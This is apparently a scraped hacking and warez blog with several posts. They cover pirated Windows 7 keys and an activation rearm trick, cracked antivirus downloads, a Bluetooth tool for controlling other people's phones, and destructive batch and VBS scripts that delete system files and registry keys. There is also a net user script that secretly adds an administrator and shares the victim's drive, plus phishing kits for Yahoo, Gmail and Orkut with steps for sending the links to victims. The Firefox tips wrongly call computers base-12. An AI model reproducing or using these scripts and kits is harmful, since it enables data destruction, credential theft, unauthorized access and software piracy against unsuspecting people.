http://rapidshare.com/files/164709810/WXPCorSP3_Offl_Ed.part6.rar
http://rapidshare.com/files/164708122/WXPCorSP3_Offl_Ed.part7.rar





How to Hack Windows 7 and Vista to Extend The Evaluation Period 4 Times





Windows 7 is going to continue the trend of rearm process in Windows 7 as well, that they did in Windows Vista. So here is a guide how you can increase the evaluation trail period by three times or more explicitly 120 days.

Trick

1. Install Windows 7 without any product activation key.

2. After installation is completed, use Windows 7 for 30 days and wait for the remaining days left to activate Windows counting down to 0, or almost zero.

3. When the activation grace period (or evaluation trial period) is almost expired log on to Windows 7 desktop, and open a Command Prompt window( type Cmd in Start Search and hit Enter)

4. Type
slmgr.vbs –rearm

5.Reboot Windows 7 to enjoy another 30 days of free usage without worrying about activation nor even need to crack Windows 7.

When the activation grace period countdown timer almost running down to 0 again, repeat the rearm trick to enjoy another 30 days of Windows 7 for free. User can run the rearm command for maximum of 3 times.
Windows Vista slmgr.vbs Configuration

slmgr.vbs is an important feature in Windows Vista. Lemme tell you what other things you can achieve with it.

* -ipk Product Key Install enterprise license key (where Product Key represents the actual key) to enable KMS host functionality.
* -dli Display license information.
* -ato Attempt immediate activation.
* -sprt port Set KMS host listening port (where port is the port ID).
* -sdns Enable dynamic DNS publishing (default).
* -cdns Disable dynamic DNS publishing.
* -cpri Set KMS processor priority to low.
* -spri Set KMS processor priority to normal (default).
* -xpr Display the date when the activation will expire

Windows 7 Free Activations Keys



* J7PYM-6X6FJ-QRKYT-TW4KF-BY7H9
* D67PP-QBKVV-6FWDJ-4K2XB-D4684
* HQDKC-F3P6D-C9YYM-HRB89-QDBB7
* 76DX2-7YMCQ-K2WCP-672K2-BK44W
* 2RG93-6XVFJ-RKHQ7-D2RTT-3FMQT
* TT63R-8JGWP-WWT97-R6WQC-4CVWY
* YQJX6-D6TRM-VWBM7-PHDJK-YPXJH
* Q7J7F-GQHBT-Q42RQ-2F8XV-2WKKM
* KH4X7-JY8G7-RCD7G-BYDJW-YTPXH
* WYBJ8-8QVP3-24R82-VV2VP-72Q9W
* 9DP2R-W78GJ-GJBKW-CKR46-H3WYT
* CXB7F-WWCM4-BP9V3-2YH43-RK8Y6
* W9BYV-K2TB8-4YDJT-QBQWP-KFDHB
* WGDJW-B8DYC-WVKX4-6MKF4-B8PK8
* 2PHXF-9PBDW-D3WWY-CPDKD-XG87V

Continue Reading......

Top 20 ebooks download sites

1.
FreeBookSpot

FreeBookSpot is an online source of free ebooks download with 4485 FREE E-BOOKS in 96 categories which up to 71,97 GB.

You can search and download free books in categories like scientific, engineering, programming, fiction and many other books. No registration is required to download free e-books.
http://www.FreebookSpot.com

2.
4eBooks

4eBooks has a huge collection of computer programming ebooks. Each downloadable ebook has a short review with a description. You can find over thousand of free ebooks in every computer programming field like .Net, Actionscript, Ajax, Apache and etc.

http://www.4ebooks.org
3.
Free-eBooks

Free-eBooks is an online source for free ebook downloads, ebook resources and ebook authors. Besides free ebooks, you also download free magazines or submit your own ebook.

You need to become a Free-EBooks.Net member to access their library. Registration is free.

http://www.free-ebooks.net
4.
ManyBooks

ManyBooks provides free ebooks for your PDA, iPod or eBook Reader. You can randomly browse for a ebook through the most popular titles, recommendations or recent reviews for visitors. There are 21,282 eBooks available here and they’re all free!

http://www.manybooks.net
5.
GetFreeEBooks

GetFreeEBooks is a free ebooks site where you can download free books totally free. All the ebooks within the site are legal downloadable free ebooks.

http://www.getfreeebooks.com
6.
FreeComputerBooks

FreeComputerBooks consists of a huge collection of free online Computer, Programming, Mathematics, Technical Books, Lecture Notes and Tutorials. It is very well categorized by topics, with 12 top level categories, and over 150 sub-categories.

http://www.freecomputerbooks.com
7.
FreeTechBooks

FreeTechBooks lists free online computer science, engineering and programming books, textbooks and lecture notes, all of which are legally and freely available over the Internet. Throughout FreeTechBooks, other terms are used to refer to a book, such as ebook, text, document, monogram or notes.

http://www.freetechbooks.com
8.
Scribd

Scribd, the online document sharing site which supports Word, Excel, PowerPoint, PDF and other popular formats. You can download a document or embed it in your blog or web page.

http://www.scribd.com
9.
Globusz

Globusz is a unique ePublishing house, specializing in free eBook downloads. They also provide an excellent Star Rating Showcase for new and evolving authors.

http://www.globusz.com
10.
KnowFree

KnowFree is a web portal where users are able to exchange freely e-books, video training and other materials for educational purposes and self-practice.

http://www.knowfree.net
11.
OnlineFreeEBooks

OnlineFreeEBooks provides links to various ebooks (mostly in pdf) spanning in 9 big categories which are: Automotive Ebooks, Business Ebooks, Engineering Ebooks, Gadget Ebooks, Hardware Ebooks, Health & Medical Ebooks, Hobbies Ebooks, Programming & Technology Ebooks, Sport & Martial Art Ebooks.

http://www.onlinefreeebooks.net
12.
MemoWare

MemoWare has a unique collection of thousands of documents (databases, literature, maps, technical references, lists, etc.) specially formatted to be easily added to your PalmOS device, Pocket PC, Windows CE, EPOC, Symbian or other handheld device.

http://www.memoware.com
13.
BluePortal

http://www.zillr.org
14.
OnlineComputerBooks

OnlineComputerBooks contains details about free computer books, free ebooks, free online books and sample chapters related to Information Technology, Computer Science, Internet, Business, Marketing, Maths, Physics and Science which are provided by publishers or authors.

http://www.onlinecomputerbooks.com
15.
SnipFiles

SnipFiles offers you free ebooks and software legally by brought or attained PLR, resale or master rights to all the products on their page.

http://www.snipfiles.com
16.
BookYards

BookYards is a web portal in which books, education materials, information, and content will be freely to anyone who has an internet connection.

http://www.bookyards.com
17.
The Online Books Page

The Online Books Page is a Listing over 30,000 free books on the Web.

http://www.digital.library.upenn.edu/books
18.
AskSam Ebooks

AskSam Ebooks has a collection of free e-books like Shakespeare, and assorted legal & governmental texts.

http://www.digital.library.upenn.edu/books
19.
Baen Free Library

http://www.baen.com/library

Baen Free Library is an online library of downloadable science fiction novels.
20.
eBookLobby

Free ebooks in eBookLobby are divided into different categories. Categorys range from business, art, computing and education. Select the category appropriate to the e-book you’re looking for.

http://www.ebooklobby.com

Continue Reading......

Tuesday, June 16, 2009

AVIRA,AVG 5,Quick Heal,KS & more Antivirus softz

AVG Antivirus




* Easy to download, install and use
* Protection against all Internet threats
* Real-time security while you surf and chat online
* Top-quality protection that does not slow your system down
* Free support and service around the clock and across the globe
* Compatible with Windows Vista and Windows XP

Download:
code:

http://rapidshare.com/files/128815969/AP.8.0.138.rar


Download AntiVir Personal 9.0.0.403


AntiVir Personal 9.0.0.403
Avira GmbH - 30.80MB (Non-Commercial Freeware)


Title: AntiVir Personal 9.0.0.403
Filename: avira_antivir_personal_en.exe
File size: 30.80MB (32,299,960 bytes)
Requirements: Windows 2000/XP/Vista/XP64/Vista64
License: Non-Commercial Freeware


http://www.filehippo.com/download_antivir/download/6b44bb0191555799e88160e957141f00/


Quick Heal Total Security 2008




SCREEN SHOT:




INFO:

Quick Heal Total Security 2008 gives you complete protection from viruses, spywares, and hackers. It also helps you stay connected and communicate over the internet by preventing your system from threats over the Internet. With Quick Heal Total Security in your PC - Enjoy your freedom to work and play in the connected world.

With Quick Heal Total Security 2008 in your PC, you can scan and clean mobile phone connected via Bluetooth or USB cable.

Detects and removes viruses, worms and trojans automatically. Protects your files, scans and cleans infection from email attachments and Internet downloads automatically.

AntiSpyware
Blocks spywares before they get installed on your PC. Protects your privacy by detecting and cleaning spywares and blocking their activities of identity theft automatically.

Firewall
Quick Heal Firewall Professional 2.0 powered by Agnitum Outpost locks hackers and thieves out of your PC. Delivers total protection against known and unknown internal and external network based attacks.


Process of Installing:-
1.Download the Given File .
2.Extract the DownloadED File.Then it will give you two file (tsnteval.exe) and(Quick Heal Total Security 2008 Version 9.50.exe).
3.Then Install tsnteval.exe file.After Installing Disable Quick Heal Total Security from Side Bar .
4.After Disabling the Quick Heal Total Security Start the Downloded Patch Quick Heal Total Security 2008 Version 9.50.exe.
5.After Patching Restart your PC.
6.Ok..
7.Enjoy the Full Version Quality

DOWNLOAD LINK:

http://moourl.com/l0y65

Continue Reading......

Super Bluetooth Hack(2008)

This is a new version of Super Bluetooth Hack for conventional and mobile-based simbian.

If you do not know what a Super Bluetooth Hack, this program through MDM can be controlled by other peoples mobile phone at a distance (10-15 metres, its Then)
More in new version:
Connect via BT/Irda
Reading SMS
Changing time/alarms
Pressing keys

Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone it includes all call functions like hold etc.

Install:

1) Download
2) Pour on the mobile
3) Run the Installer (what you download, incidentally need JAVA)
4) He finds it, and you will be able to run software
5) Choose the language and going configured
6) Click Connection
7) Click search devices
Choose the victim
9) AND MANAGE

Download

Code:
http://uploading.com/files/87DWQUDD/..._2008.rar.html

Continue Reading......

FREE GPRS FOR ALL NETWORKS

Manual Airtel Gprs Settings (FREE GPRS)


1. Homepage - any page you want to set.
2. User Name - Blank
3. Password - Blank
4. Proxy - Enabled/yes.
5. Proxy and Server Adress - 202.56.231.117
6. Proxy and Server Port - 8080
7. Data bearer - GPRS or Packet Data.
8. Access Point Name - airtelgprs.com
9. Authentication Type - Normal
10. Use preferred access point - No


idea_GPRS {FREE GPRS}........

1. Account Name - idea_GPRS
2. Username - Blank
3. Password - Blank
4. Homepage - http://wap.ideafresh.com
5. Proxy and Server Port - 8080
6. Proxy and Server adress - 10.4.42.45
7. Databearer - GPRS / Packetdata
8. Acces Point Name - imis
9. Proxy - Enabled/yes
10. Authentication Type - Normal


Bsnl Gprs Settings ........

1. Account Name - BPL WAP
2. Username -
3. Password -
4. Proxy - Enabled/yes
5. Homepage - http://wap.mizone.bplmobile.com
6. Proxy and Server address - 10.0.0.10
7. Proxy and Server Port - 8080
8. Acces Point Name - mizone
9. Data bearer - GPRS/ Packetdata
10. Authentication Type - Normal

Airtel live settings


1. Account Name - Airtel_live
2. Homepage - http://live.airtelworld.com
3. Username - Blank
4. Password - Blank
5. Proxy - Enabled/yes
6. Proxy and Server Adress - 100.1.200.99
7. Accespoint Name - airtelfun.com
8. Proxy and Server Port - 8080
9. Data bearer - GPRS/ Packet Data
10. Authentication Type - Normal

Hutch Gprs Settings



1. Account Name - Hutch_GPRS
2. User Name - Blank
3. Password - Blank
4. Proxy - Enabled/yes
5. Access Point Name - portalnmms
6. Full Internet Access Point Name - www
7. Proxy and Server address - 10.10.1.100
8. Proxy and Server Port - 8080
9. Homepage - http://hutchworld.co.in
10. Authentication Type - Normal

AIRTEL FREE Gprs Settings (d settings which i hv been using from last 1 yr n above)..


Profile name- AirtelGPRS [or whateva u want]
APN - airtelfun.com.com (If mms is not activated then first activate it)
proxy 100.1.200.99
Port - 8080
Connection - Secure or anything both will work
Homepage - anything


More proxiez :-
Proxy FOr north users(India)- 100.1.200.99 or 10.2.45.155
Proxy For south users (India): 10.49.16.10 or 10.89.15.15 !!


RELIANCE manual settings+ [FREE]



1. Account Name -RELIANCE
2. Username - Blank
3. Password - Blank
4. Homepage - http://wap.rworld.com/gsm/index.wml
5. Proxy and Server Port - 8080
6. Proxy and Server adress - 97.253.29.199
7. Databearer - GPRS / Packetdata
8. APN : smartwap
9. Proxy - Enabled/yes
10. Authentication Type - Normal


▬▬▬▬▬▬▬▬▬▬▬

Continue Reading......

Monday, June 15, 2009

Folder lock 6.2.4

Folder lock 6.2.4 - -


Folder Lock v6.2.4 Folder Lock is fast file-security software that can password-protect, lock, hide, and encrypt any number of files, folders, drives, pictures, and documents in seconds. Locked files are undeletable, unrenamable, unmovable, hidden, and inaccessible. You can lock, scramble, or encrypt depending on speed and security. Folder Lock is fully portable, so you can protect your files on USB flash drives, disks, CD-RWs, notebooks, and hard disks, and it doesn't require installation on another PC. Folder Lock protects files in Windows, DOS, and Safe modes, even when you change your OS or boot from a disk. Folder Lock doesn't let you delete its own program folder, and it can't be uninstalled without the correct password. Additional options include Stealth Mode, Hacker Attempt Monitoring, Shred files, AutoLock, Auto Shutdown PC, Lock your PC, Erase PC tracks, 256-bit Blowfish Encryption and Context Menu in Explorer.What is Folder Lock?Folder Lock and #65533; is a fast data encryption and password protection software for Windows. It can simultaneously encrypt, lock and password protect your files, folders, drives, USB drives and even CD/DVD-RW.Folder Lock creates encrypted storages called 'Lockers'.

http://rapidshare.com/files/242600895/Folder_Lock_6.2.4_-Fz-.rar

Continue Reading......

Deadly and Funny Commands

[DEADLY & funny COMMANDS]
8 deadly windows .vbs commands

All you need to do is to copy the codes, paste it in any notepad or text file, than save the text file with anyname.vbs , and don't forget to change the format from text file to all files.


1.The blue screen of Death [this might be dangerous]

Code:-

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00




2.Stupidity Shutdown

/*This pops up a funny message then will shutdown the computer*/

code:-

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10


3.-Delete Key Registry Files [it IS DANGEROUS!! USE AT UR OWN RISK]

*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. Have a nice day.
GOTO MESSAGE




4.Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


5.Crazy caps lock

/*This constantly turns caps lock on and off really fast continuously*/

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

6.Endless Enter

/*This constantly makes it so the enter button is being pressed continuesly*/

Code:-
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop



7.-Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


8.-Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop




NET USER COMMANDS



Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

---------------------- Starting -------------------
-:Server:-

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user harish/add
What does this do? It makes a new user called harish you can put
any name you want

Command #2-> net localgroup administrators harish/add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands

Continue Reading......

Yahoo,gmail,facebook,orkut Hacks

Facebook Hack: How to See the Album of Any Private User



Facebook has grown stupendously popular over the years. While privacy is a thing of assurance for some, it is annoyance for most. So here is a trick that will help you to see any locked profile. This trick will let you see anyone’s tagged photos even if they are private for you.
Trick
Step1: Log into facebook and don't worry about making another account. They will not be able to trace you down and ban you.

Step2:

* Find the person's unique profile ID.
* Search for them and click view friends or send message.
* Write the unique ID from the address bar (only the numbers) or copy it somewhere else.


Step3: Now that you have your unique profile ID you can use the next two links to view a total of 40 tagged photos:
If you wish to see tagged photos added by others use this link:

http://www.facebook.com/photo.php?pid=12345678&op=1&view=all&subj=[Unique ID]&id=[Unique ID]

If you wish to see tagged photos added by themselves use this link:

http://www.facebook.com/photo.php?pid=13245678&op=1&view=user&subj=[Unique ID]&id=[Unique ID]

Each link contains two places for [Unique ID] you simply replace this with the person’s unique ID that you have copied at the first step.
REMOVE THE BRACKETS IN [UNIQUE ID] .. replace that whole thing with the profile ID you copied.
Step4: You can now see up to 40 photos of someone on a private profile. Enjoy.
[Note: Information via brettz, we haven't tested it ourselves. It is for informational purposes only and not intended to be used.


How to create yahoo/orkut fake webpage in order 2 get da victim pass.



First download this fake page and php mailer for that
.
http://rapidshare.com/files/735705/YahooFake1.2.zip.html

INSTRUCTIONS:
1)Download the zip file given above
2)Extract the contents to of a folder
3)Edit mailer.php file with notepad and keep the email ID where you want hacked passwords to come as.
4)Uplaod all the 3 pages Loginerror.html ,index.html,mailer.php to a free webhost site
5)Send the site link to the victim
6)When he logs in tha uploaded yahoo fake page ,The ID pass which the victim entered will be sent to the email ID which you entered in mailer.php file.

***More Installation instructions***

*You need a hosting account with PHP installed.
If you do not have one you can make one for free @ http://www.tripod.lycos.co.uk/ or http://www.igotfree.com or search for more webhosts with PHP support , no forced ads.

*You only need to change 2 variables in this script.
- ($to = "Put_Email_Here@yahoo.com";) Email
- ($mailOrText = "YeS";) "yes" for email "no" for text file on server

*Place YOUR email between the quotes $to = "emailid@yahoo.com";

*Upload ALL the files to the server!

If you are not able to upload files in lycos then use some other server the best is
"www.ripway.com"


Gmail Hacking ~ Phisher


Download Link: http://h1.ripway.com/tr0j4n3d/Gmail.rar


Method is the same download the files from the given link.

Extract them and upload to any free php hosting site like www.ripway.com

Send the link of the index page to the victim making any story

When the victim signs in the password is stored in the passes.txt file.

Continue Reading......

Speed Up Mozilla

Speed Up firefox for a better web experience

Mozilla Firefox is a graphical web browser developed by the Mozilla Corporation. Started as a fork of the browser component (Navigator) of the Mozilla Application Suite, Firefox has replaced the Mozilla Suite as the flagship product of the Mozilla project, stewarded by the Mozilla Foundation and a large community of external contributors.

Mozilla Firefox is a cross-platform browser, providing support for various versions of Microsoft Windows, Mac OS X, and Linux. Although not officially released for certain operating systems, the freely available source code works for many other operating systems, including FreeBSD,OS/2, Solaris, SkyOS, BeOS and more recently, Windows XP Professional x64 Edition.

I am providing some Very Useful Tips to speedup your Firefox.

In your location bar, type about:config

Once it Opens You should see similar to the following screen

Tip1

In the filter bar type network.http.pipelining

You should see the following screen

Normally it says ” false ” under value field , Double click it so it becomes ” true “.

Once you finished this you should see the following screen.

Tip2

In the filter bar again and type network.http.pipelining.maxrequests

Once it Opens You should see the following screen

Default it says 4 under value field and you need to change it to 8

Once you finished this you should see the following screen.

Tip3

Go to the filter bar again and type network.http.proxy.pipelining

Once it Opens You should see similar to the following screen

Normally it says ” false ” under value field , Double click it so it becomes ” true “.

Once you finished this you should see the following screen.

Tip4

Go to the filter bar again and type network.dns.disableIPv6

Once it Opens You should see the following screen

Normally it says ” false ” under value field , Double click it so it becomes ” true “.

Once you finished this you should see the following screen.

Tip5

Go to the filter bar again and type plugin.expose_full_path

Once it Opens You should see the following screen

Normally it says ” false ” under value field , Double click it so it becomes ” true “.

Once you finished this you should see the following screen.

Tip6

Now you need to Create new Preference name with interger value for this got to Right click -> New -> Integer

Once it opens you should see the following screen

Here you need to type nglayout.initialpaint.delay and click ok

Now you need to enter 0 in value filed and click ok

Once you finished this you should see the following screen.

Tip7

Now you need to Create one more Preference name with interger value for this got to Right click -> New -> Integer

Once it opens you should see the following screen

Here you need to type content.notify.backoffcount and click ok

Now you need to enter 5 in value filed and click ok

Once you finished this you should see the following screen.

Tip8

Now you need to Create one more Preference name with interger value for this got to Right click -> New -> Integer

Once it opens you should see the following screen

Here you need to type ui.submenuDelay and click ok

Now you need to enter 0 in value filed and click ok

Once you finished this you should see the following screen.

Some more Tweaks

Enable the spellchecker for inputfields and textareas (default is textareas only)

layout.spellcheckDefault=2

Open lastfm://-links directly in amarok

network.protocol-handler.app.lastfm=amarok
network.protocol-handler.external.lastfm=true
Firefox Memory Leak Fix

Open a new tab. Type “about:config” without quotes into the address bar and hit enter/click Go.

Right-click anywhere, select New, then Integer. In the dialog prompt that appears, type:

browser.cache.memory.capacity

Click OK. Another dialog prompt will appear. This is where you decide how much memory to allocate to Firefox. This depends on how much RAM your computer has, but generally you don’t want to allocate too little (under 8MB), but if you allocate too much, you might as well not do this. A good recommended setting is 16MB. If you want 16MB, enter this value into the dialog prompt:

16384

(Why 16384 instead of 16000? Because computers use base-12 counting. Thus 16 megabytes = 16384 bytes. Likewise, if you want to double that and allocate 32MB, you’d enter 32768.)

Click OK to close the dialog box, then close all instances of Firefox and restart. If your Firefox still uses the same amount of memory, give it a few minutes and it should slowly clear up. If that fails, try a system reboot.

Now your Firefox will now be 3 - 30 times faster in loading pages.

Continue Reading......

Increase Browsing Speed

DNS TRICK:

When you connect to a website,your computer sends information back forth.Some of this deals with resolving the site name to an IP address.This is the stuff that TCP/IP really deals with,not words.You can increase the DNS cache by a simple Registry tweak.

#Open Notepad and copy-paste the
following code and save it with the filename dnscache.reg .

This is what you have to copy:

Windows registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

SECOND METHOD:
Click Start then Run and type "gpedit.msc" without quotes.

This opens the "group policy editor" and go to: "Local Computer Policy"

Then "Computer Configuration" Then "Administrative Templates"

Then select "Network" then "QOS Packet Scheduler"

After that select "Limit Reservable Bandwidth".
Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e." By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20

THIRD METHOD:

Increases the number of allowed simultaneous connections to ten (10).


[Start] --> [Run] --> Type Regedit --> Press Enter --> then Navigate to following key.

Registry Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings



Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: REG_DWORD [Dword Value] // Value Name: MaxConnectionsPerServer
Setting for Value Data: [0000000a]



Exit Registry and Reboot

Continue Reading......

Firefox Ultimate Optimizer 2009

Firefox Ultimate Optimizer 2009



Firefox Optimizers for Mozilla Firefox v1.x / 2.x / 3.x was developed for an easy and fast optimization of your browsing experience with Firefox. It is based on a collection of popular and well working optimization settings used and tested by the experts. Usually you have to optimize Firefox manually, which can be time consuming and difficult for the novice user. FireTune helps you here - it includes all the performance optimizations. The only thing you must do is: make your selection. Firefox Optimizers does the work for you.Details on what exactly Optimizers does can be found in the help file.
In most of all cases you'll notice an improved browsing speed after optimizing Firefox.
Would you use a program that would reduce the memory usage of Firefox to 100-200 Kilobyte ? I have no idea how the Firefox Ultimate Optimizer is reducing the memory usage to this amount but the task manager is verifying the reduction. Firefox has been using roughly 40 Megabytes of RAM whenever I started it and one homepage was loaded.

After starting Firefox Ultimate Optimizer the RAM usage was reduced to 188 Kilobyte even with Firefox as the active window. The software does not have to be configured and sits in the system tray all the time.

DOWNLOAD:
Code:

http://rapidshare.com/files/244244967/CW_Firefox_Optimizer.rar


PASSWORD:
Code:

hiphopshaker69@CW

Continue Reading......